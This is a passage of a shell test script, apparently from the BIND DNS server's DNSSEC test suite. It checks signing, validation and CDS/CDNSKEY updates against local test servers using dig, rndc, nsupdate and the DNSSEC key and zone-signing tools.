+dig_with_opts +norec b.c.d.optout-tld. \ + @10.53.0.6 A > dig.out.ns6.test$n || ret=1 +nsec3=$(grep -c "IN.NSEC3" dig.out.ns6.test$n || true) +[ "$nsec3" -eq 1 ] || ret=1 +dig_with_opts optout-tld. \ + @10.53.0.4 SOA > dig.out.soa.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.soa.ns4.test$n > /dev/null || ret=1 +dig_with_opts b.c.d.optout-tld. \ + @10.53.0.4 A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that key id are logged when dumping the cache ($n)" +ret=0 +rndc_dumpdb ns4 +grep "; key id = " ns4/named_dump.db.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check KEYDATA records are printed in human readable form in key zone ($n)" +# force the managed-keys zone to be written out +rndccmd 10.53.0.4 managed-keys sync 2>&1 | sed 's/^/ns4 /' | cat_i +for i in 1 2 3 4 5 6 7 8 9 +do + ret=0 + if test -f ns4/managed-keys.bind + then + grep KEYDATA ns4/managed-keys.bind > /dev/null && + grep "next refresh:" ns4/managed-keys.bind > /dev/null && + break + fi + ret=1 + sleep 1 +done +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check dig's +nocrypto flag ($n)" +ret=0 +dig_with_opts +norec +nocrypto DNSKEY . \ + @10.53.0.1 > dig.out.dnskey.ns1.test$n || ret=1 +grep -E "256 [0-9]+ $DEFAULT_ALGORITHM_NUMBER \\[key id = [1-9][0-9]*]" dig.out.dnskey.ns1.test$n > /dev/null || ret=1 +grep -E "RRSIG.* \\[omitted]" dig.out.dnskey.ns1.test$n > /dev/null || ret=1 +dig_with_opts +norec +nocrypto DS example \ + @10.53.0.1 > dig.out.ds.ns1.test$n || ret=1 +grep -E "DS.* [0-9]+ [12] \[omitted]" dig.out.ds.ns1.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check simultaneous inactivation and publishing of dnskeys removes inactive signature ($n)" +ret=0 +cnt=0 +while : +do +dig_with_opts publish-inactive.example @10.53.0.3 dnskey > dig.out.ns3.test$n +keys=$(awk '$5 == 257 { print; }' dig.out.ns3.test$n | wc -l) +test "$keys" -gt 2 && break +cnt=$((cnt+1)) +test "$cnt" -gt 120 && break +sleep 1 +done +test "$keys" -gt 2 || ret=1 +sigs=$(grep -c RRSIG dig.out.ns3.test$n || true) +n=$((n+1)) +test "$sigs" -eq 2 || ret=1 +if test "$ret" -ne 0 ; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "check that increasing the sig-validity-interval resigning triggers re-signing ($n)" +ret=0 +before=$($DIG axfr siginterval.example -p "$PORT" @10.53.0.3 | grep RRSIG.SOA) +cp ns3/siginterval2.conf ns3/siginterval.conf +rndccmd 10.53.0.3 reconfig 2>&1 | sed 's/^/ns3 /' | cat_i +i=10 +while [ "$i" -ge 0 ]; do +after=$($DIG axfr siginterval.example -p "$PORT" @10.53.0.3 | grep RRSIG.SOA) +test "$before" != "$after" && break +sleep 1 +i=$((i-1)) +done +n=$((n+1)) +if test "$before" = "$after" ; then echo_i "failed"; ret=1; fi +status=$((status+ret)) + +if [ -x "$PYTHON" ]; then + echo_i "check dnskey-sig-validity sets longer expiry for DNSKEY ($n)" + ret=0 + rndccmd 10.53.0.3 sign siginterval.example 2>&1 | sed 's/^/ns3 /' | cat_i + # convert expiry date to a comma-separated list of integers python can + # use as input to date(). strip leading 0s in months and days so + # python3 will recognize them as integers. + $DIG +dnssec +short -p "$PORT" @10.53.0.3 soa siginterval.example > dig.out.soa.test$n + soaexpire=$(awk '$1 ~ /SOA/ { print $5 }' dig.out.soa.test$n | + sed 's/\(....\)\(..\)\(..\).*/\1, \2, \3/' | + sed 's/ 0/ /g') + $DIG +dnssec +short -p "$PORT" @10.53.0.3 dnskey siginterval.example > dig.out.dnskey.test$n + dnskeyexpire=$(awk '$1 ~ /DNSKEY/ { print $5; exit 0 }' dig.out.dnskey.test$n | + sed 's/\(....\)\(..\)\(..\).*/\1, \2, \3/' | + sed 's/ 0/ /g') + $PYTHON > python.out.$n <<EOF +from datetime import date; +ke=date($dnskeyexpire) +se=date($soaexpire) +print((ke-se).days); +EOF + diff=$(cat python.out.$n) + [ "$diff" -ge 55 ] || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +copy_setports ns4/named4.conf.in ns4/named.conf +rndccmd 10.53.0.4 reconfig 2>&1 | sed 's/^/ns4 /' | cat_i +sleep 3 + +echo_i "check insecure delegation between static-stub zones ($n)" +ret=0 +dig_with_opts ns insecure.secure.example \ + @10.53.0.4 > dig.out.ns4.1.test$n || ret=1 +grep "SERVFAIL" dig.out.ns4.1.test$n > /dev/null && ret=1 +dig_with_opts ns secure.example \ + @10.53.0.4 > dig.out.ns4.2.test$n || ret=1 +grep "SERVFAIL" dig.out.ns4.2.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check the acceptance of seconds as inception and expiration times ($n)" +ret=0 +in="NSEC 8 0 86400 1390003200 1389394800 33655 . NYWjZYBV1b+h4j0yu/SmPOOylR8P4IXKDzHX3NwEmU1SUp27aJ91dP+i+UBcnPmBib0hck4DrFVvpflCEpCnVQd2DexcN0GX+3PM7XobxhtDlmnU X1L47zJlbdHNwTqHuPaMM6Xy9HGMXps7O5JVyfggVhTz2C+G5OVxBdb2rOo=" + +exp="NSEC 8 0 86400 20140118000000 20140110230000 33655 . NYWjZYBV1b+h4j0yu/SmPOOylR8P4IXKDzHX3NwEmU1SUp27aJ91dP+i +UBcnPmBib0hck4DrFVvpflCEpCnVQd2DexcN0GX+3PM7XobxhtDlmnU X1L47zJlbdHNwTqHuPaMM6Xy9HGMXps7O5JVyfggVhTz2C+G5OVxBdb2 rOo=" + +out=$(echo "IN RRSIG $in" | $RRCHECKER -p | sed 's/^IN.RRSIG.//') +[ "$out" = "$exp" ] || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check the correct resigning time is reported in zonestatus ($n)" +ret=0 +rndccmd 10.53.0.3 \ + zonestatus secure.example > rndc.out.ns3.test$n +# next resign node: secure.example/DNSKEY +qname=$(awk '/next resign node:/ { print $4 }' rndc.out.ns3.test$n | sed 's,/.*,,') +qtype=$(awk '/next resign node:/ { print $4 }' rndc.out.ns3.test$n | sed 's,.*/,,') +# next resign time: Thu, 24 Apr 2014 10:38:16 GMT +time=$(awk 'BEGIN { m["Jan"] = "01"; m["Feb"] = "02"; m["Mar"] = "03"; + m["Apr"] = "04"; m["May"] = "05"; m["Jun"] = "06"; + m["Jul"] = "07"; m["Aug"] = "08"; m["Sep"] = "09"; + m["Oct"] = "10"; m["Nov"] = "11"; m["Dec"] = "12";} + /next resign time:/ { printf "%d%s%02d%s\n", $7, m[$6], $5, $8 }' rndc.out.ns3.test$n | sed 's/://g') +dig_with_opts +noall +answer "$qname" "$qtype" @10.53.0.3 > dig.out.test$n +expire=$(awk '$4 == "RRSIG" { print $9 }' dig.out.test$n) +inception=$(awk '$4 == "RRSIG" { print $10 }' dig.out.test$n) +$PERL -e 'exit(0) if ("'"$time"'" lt "'"$expire"'" && "'"$time"'" gt "'"$inception"'"); exit(1);' || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that split rrsigs are handled ($n)" +ret=0 +dig_with_opts split-rrsig soa @10.53.0.7 > dig.out.test$n || ret=1 +awk 'BEGIN { ok=0; } $4 == "SOA" { if ($7 > 1) ok=1; } END { if (!ok) exit(1); }' dig.out.test$n || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that not-at-zone-apex RRSIG(SOA) RRsets are removed from the zone after load ($n)" +ret=0 +dig_with_opts split-rrsig AXFR @10.53.0.7 > dig.out.test$n || ret=1 +grep -q "not-at-zone-apex.*RRSIG.*SOA" dig.out.test$n && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that 'dnssec-keygen -S' works for all supported algorithms ($n)" +ret=0 +alg=1 +until test $alg -eq 256 +do + zone="keygen-$alg." + case $alg in + 2) # Diffie Helman + alg=$((alg+1)) + continue;; + 157|160|161|162|163|164|165) # private - non standard + alg=$((alg+1)) + continue;; + 1|5|7|8|10) # RSA algorithms + key1=$($KEYGEN -a "$alg" -b "1024" -n zone "$zone" 2> "keygen-$alg.err" || true) + ;; + 15|16) + key1=$($KEYGEN -a "$alg" -n zone "$zone" 2> "keygen-$alg.err" || true) + # Soft-fail in case HSM doesn't support Edwards curves + if grep "not found" "keygen-$alg.err" > /dev/null && [ "$CRYPTO" = "pkcs11" ]; then + echo_i "Algorithm $alg not supported by HSM: skipping" + alg=$((alg+1)) + continue + fi + ;; + *) + key1=$($KEYGEN -a "$alg" -n zone "$zone" 2> "keygen-$alg.err" || true) + esac + if grep "unsupported algorithm" "keygen-$alg.err" > /dev/null + then + alg=$((alg+1)) + continue + fi + if test -z "$key1" + then + echo_i "'$KEYGEN -a $alg': failed" + cat "keygen-$alg.err" + ret=1 + alg=$((alg+1)) + continue + fi + $SETTIME -I now+4d "$key1.private" > /dev/null + key2=$($KEYGEN -v 10 -i 3d -S "$key1.private" 2> /dev/null) + test -f "$key2.key" -a -f "$key2.private" || { + ret=1 + echo_i "'dnssec-keygen -S' failed for algorithm: $alg" + } + alg=$((alg+1)) +done +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDS records are signed using KSK by dnssec-signzone ($n)" +ret=0 +dig_with_opts +noall +answer @10.53.0.2 cds cds.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDS records are not signed using ZSK by dnssec-signzone -x ($n)" +ret=0 +dig_with_opts +noall +answer @10.53.0.2 cds cds-x.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that positive unknown NSEC3 hash algorithm does validate ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 nsec3-unknown.example SOA > dig.out.ns3.test$n +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 nsec3-unknown.example SOA > dig.out.ns4.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDS records are signed using KSK by with dnssec-auto ($n)" +ret=0 +dig_with_opts +noall +answer @10.53.0.2 cds cds-auto.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that a CDS deletion record is accepted ($n)" +ret=0 +( +echo zone cds-update.secure +echo server 10.53.0.2 "$PORT" +echo update delete cds-update.secure CDS +echo update add cds-update.secure 0 CDS 0 0 0 00 +echo send +) | $NSUPDATE > nsupdate.out.test$n 2>&1 +dig_with_opts +noall +answer @10.53.0.2 cds cds-update.secure > dig.out.test$n +lines=$(awk '$4 == "CDS" {print}' dig.out.test$n | wc -l) +test "${lines:-10}" -eq 1 || ret=1 +lines=$(tr -d '\r' < dig.out.test$n | awk '$4 == "CDS" && $5 == "0" && $6 == "0" && $7 == "0" && $8 == "00" {print}' | wc -l) +test "$lines" -eq 1 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDS records are signed using KSK when added by nsupdate ($n)" +ret=0 +( +echo zone cds-update.secure +echo server 10.53.0.2 "$PORT" +echo update delete cds-update.secure CDS +echo send +dig_with_opts +noall +answer @10.53.0.2 dnskey cds-update.secure | +grep "DNSKEY.257" | +$DSFROMKEY -12 -C -f - -T 1 cds-update.secure | +sed "s/^/update add /" +echo send +) | $NSUPDATE +dig_with_opts +noall +answer @10.53.0.2 cds cds-update.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +lines=$(awk '$4 == "CDS" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDS records are signed only using KSK when added by" +echo_ic "nsupdate when dnssec-dnskey-kskonly is yes ($n)" +ret=0 +keyid=$(cat ns2/cds-kskonly.secure.id) +( +echo zone cds-kskonly.secure +echo server 10.53.0.2 "$PORT" +echo update delete cds-kskonly.secure CDS +echo send +dig_with_opts +noall +answer @10.53.0.2 dnskey cds-kskonly.secure | +grep "DNSKEY.257" | +$DSFROMKEY -12 -C -f - -T 1 cds-kskonly.secure | +sed "s/^/update add /" +echo send +) | $NSUPDATE +dig_with_opts +noall +answer @10.53.0.2 cds cds-kskonly.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +lines=$(awk -v id="${keyid}" '$4 == "RRSIG" && $5 == "CDS" && $11 == id {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +lines=$(awk '$4 == "CDS" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDS deletion records are signed only using KSK when added by" +echo_ic "nsupdate when dnssec-dnskey-kskonly is yes ($n)" +ret=0 +keyid=$(cat ns2/cds-kskonly.secure.id) +( +echo zone cds-kskonly.secure +echo server 10.53.0.2 "$PORT" +echo update delete cds-kskonly.secure CDS +echo update add cds-kskonly.secure 0 CDS 0 0 0 00 +echo send +) | $NSUPDATE +dig_with_opts +noall +answer @10.53.0.2 cds cds-kskonly.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +lines=$(awk -v id="${keyid}" '$4 == "RRSIG" && $5 == "CDS" && $11 == id {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +lines=$(awk '$4 == "CDS" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +lines=$(tr -d '\r' < dig.out.test$n | awk '$4 == "CDS" && $5 == "0" && $6 == "0" && $7 == "0" && $8 == "00" {print}' | wc -l) +test "$lines" -eq 1 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that positive unknown NSEC3 hash algorithm with OPTOUT does validate ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 optout-unknown.example SOA > dig.out.ns3.test$n +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 optout-unknown.example SOA > dig.out.ns4.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that a non matching CDS record is accepted with a matching CDS record ($n)" +ret=0 +( +echo zone cds-update.secure +echo server 10.53.0.2 "$PORT" +echo update delete cds-update.secure CDS +echo send +dig_with_opts +noall +answer @10.53.0.2 dnskey cds-update.secure | +grep "DNSKEY.257" | +$DSFROMKEY -12 -C -f - -T 1 cds-update.secure | +sed "s/^/update add /" +dig_with_opts +noall +answer @10.53.0.2 dnskey cds-update.secure | +grep "DNSKEY.257" | sed 's/DNSKEY.257/DNSKEY 258/' | +$DSFROMKEY -12 -C -A -f - -T 1 cds-update.secure | +sed "s/^/update add /" +echo send +) | $NSUPDATE +dig_with_opts +noall +answer @10.53.0.2 cds cds-update.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +lines=$(awk '$4 == "CDS" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 4 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that negative unknown NSEC3 hash algorithm does not validate ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 nsec3-unknown.example A > dig.out.ns3.test$n +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 nsec3-unknown.example A > dig.out.ns4.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: SERVFAIL," dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDNSKEY records are signed using KSK by dnssec-signzone ($n)" +ret=0 +dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDNSKEY records are not signed using ZSK by dnssec-signzone -x ($n)" +ret=0 +dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-x.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that negative unknown NSEC3 hash algorithm with OPTOUT does not validate ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 optout-unknown.example A > dig.out.ns3.test$n +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 optout-unknown.example A > dig.out.ns4.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: SERVFAIL," dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDNSKEY records are signed using KSK by with dnssec-auto ($n)" +ret=0 +dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-auto.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that unknown DNSKEY algorithm validates as insecure ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 dnskey-unknown.example A > dig.out.ns3.test$n +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 dnskey-unknown.example A > dig.out.ns4.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that unsupported DNSKEY algorithm validates as insecure ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 dnskey-unsupported.example A > dig.out.ns3.test$n +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 dnskey-unsupported.example A > dig.out.ns4.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that unsupported DNSKEY algorithm is in DNSKEY RRset ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 dnskey-unsupported-2.example DNSKEY > dig.out.test$n +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "dnskey-unsupported-2\.example\..*IN.*DNSKEY.*257 3 255" dig.out.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# TODO: test case for GL #1689. +# If we allow the dnssec tools to use deprecated algorithms (such as RSAMD5) +# we could write a test that signs a zone with supported and unsupported +# algorithm, apply a fixed rrset order such that the unsupported algorithm +# precedes the supported one in the DNSKEY RRset, and verify the result still +# validates succesfully. + +echo_i "check that a CDNSKEY deletion record is accepted ($n)" +ret=0 +( +echo zone cdnskey-update.secure +echo server 10.53.0.2 "$PORT" +echo update delete cdnskey-update.secure CDNSKEY +echo update add cdnskey-update.secure 0 CDNSKEY 0 3 0 AA== +echo send +) | $NSUPDATE > nsupdate.out.test$n 2>&1 +dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-update.secure > dig.out.test$n +lines=$(awk '$4 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "${lines:-10}" -eq 1 || ret=1 +lines=$(tr -d '\r' < dig.out.test$n | awk '$4 == "CDNSKEY" && $5 == "0" && $6 == "3" && $7 == "0" && $8 == "AA==" {print}' | wc -l) +test "${lines:-10}" -eq 1 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that unknown DNSKEY algorithm + unknown NSEC3 has algorithm validates as insecure ($n)" +ret=0 +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 dnskey-nsec3-unknown.example A > dig.out.ns3.test$n +dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 dnskey-nsec3-unknown.example A > dig.out.ns4.test$n +grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1 +grep "status: NOERROR," dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDNSKEY records are signed using KSK when added by nsupdate ($n)" +ret=0 +( +echo zone cdnskey-update.secure +echo server 10.53.0.2 "$PORT" +echo update delete cdnskey-update.secure CDNSKEY +dig_with_opts +noall +answer @10.53.0.2 dnskey cdnskey-update.secure | +sed -n -e "s/^/update add /" -e 's/DNSKEY.257/CDNSKEY 257/p' +echo send +) | $NSUPDATE +dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-update.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +lines=$(awk '$4 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDNSKEY records are signed only using KSK when added by" +echo_ic "nsupdate when dnssec-dnskey-kskonly is yes ($n)" +ret=0 +keyid=$(cat ns2/cdnskey-kskonly.secure.id) +( +echo zone cdnskey-kskonly.secure +echo server 10.53.0.2 "$PORT" +echo update delete cdnskey-kskonly.secure CDNSKEY +dig_with_opts +noall +answer @10.53.0.2 dnskey cdnskey-kskonly.secure | +sed -n -e "s/^/update add /" -e 's/DNSKEY.257/CDNSKEY 257/p' +echo send +) | $NSUPDATE +dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-kskonly.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +lines=$(awk -v id="${keyid}" '$4 == "RRSIG" && $5 == "CDNSKEY" && $11 == id {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +lines=$(awk '$4 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that CDNSKEY deletion records are signed only using KSK when added by" +echo_ic "nsupdate when dnssec-dnskey-kskonly is yes ($n)" +ret=0 +keyid=$(cat ns2/cdnskey-kskonly.secure.id) +( +echo zone cdnskey-kskonly.secure +echo server 10.53.0.2 "$PORT" +echo update delete cdnskey-kskonly.secure CDNSKEY +echo update add cdnskey-kskonly.secure 0 CDNSKEY 0 3 0 AA== +echo send +) | $NSUPDATE +dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-kskonly.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +lines=$(awk -v id="${keyid}" '$4 == "RRSIG" && $5 == "CDNSKEY" && $11 == id {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +lines=$(awk '$4 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 1 || ret=1 +lines=$(tr -d '\r' < dig.out.test$n | awk '$4 == "CDNSKEY" && $5 == "0" && $6 == "3" && $7 == "0" && $8 == "AA==" {print}' | wc -l) +test "${lines:-10}" -eq 1 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking initialization with a revoked managed key ($n)" +ret=0 +copy_setports ns5/named2.conf.in ns5/named.conf +rndccmd 10.53.0.5 reconfig 2>&1 | sed 's/^/ns5 /' | cat_i +sleep 3 +dig_with_opts +dnssec @10.53.0.5 SOA . > dig.out.ns5.test$n +grep "status: SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that a non matching CDNSKEY record is accepted with a matching CDNSKEY record ($n)" +ret=0 +( +echo zone cdnskey-update.secure +echo server 10.53.0.2 "$PORT" +echo update delete cdnskey-update.secure CDNSKEY +dig_with_opts +noall +answer @10.53.0.2 dnskey cdnskey-update.secure | +sed -n -e "s/^/update add /" -e 's/DNSKEY.257/CDNSKEY 257/p' +dig_with_opts +noall +answer @10.53.0.2 dnskey cdnskey-update.secure | +sed -n -e "s/^/update add /" -e 's/DNSKEY.257/CDNSKEY 258/p' +echo send +) | $NSUPDATE +dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-update.secure > dig.out.test$n +lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +lines=$(awk '$4 == "CDNSKEY" {print}' dig.out.test$n | wc -l) +test "$lines" -eq 2 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that RRSIGs are correctly removed from apex when RRset is removed NSEC ($n)" +ret=0 +# generate signed zone with MX and AAAA records at apex. +( +cd signer || exit 1 +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fK remove > /dev/null +$KEYGEN -q -a $DEFAULT_ALGORITHM -33 remove > /dev/null +echo > remove.db.signed +$SIGNER -S -o remove -D -f remove.db.signed remove.db.in > signer.out.1.$n +) +grep "RRSIG MX" signer/remove.db.signed > /dev/null || { + ret=1 ; cp signer/remove.db.signed signer/remove.db.signed.pre$n; +} +# re-generate signed zone without MX and AAAA records at apex. +( +cd signer || exit 1 +$SIGNER -S -o remove -D -f remove.db.signed remove2.db.in > signer.out.2.$n +) +grep "RRSIG MX" signer/remove.db.signed > /dev/null && { + ret=1 ; cp signer/remove.db.signed signer/remove.db.signed.post$n; +} +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that RRSIGs are correctly removed from apex when RRset is removed NSEC3 ($n)" +ret=0 +# generate signed zone with MX and AAAA records at apex. +( +cd signer || exit 1 +echo > remove.db.signed +$SIGNER -3 - -S -o remove -D -f remove.db.signed remove.db.in > signer.out.1.$n +) +grep "RRSIG MX" signer/remove.db.signed > /dev/null || { + ret=1 ; cp signer/remove.db.signed signer/remove.db.signed.pre$n; +} +# re-generate signed zone without MX and AAAA records at apex. +( +cd signer || exit 1 +$SIGNER -3 - -S -o remove -D -f remove.db.signed remove2.db.in > signer.out.2.$n +) +grep "RRSIG MX" signer/remove.db.signed > /dev/null && { + ret=1 ; cp signer/remove.db.signed signer/remove.db.signed.post$n; +} +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check that a named managed zone that was signed 'in-the-future' is re-signed when loaded ($n)" +ret=0 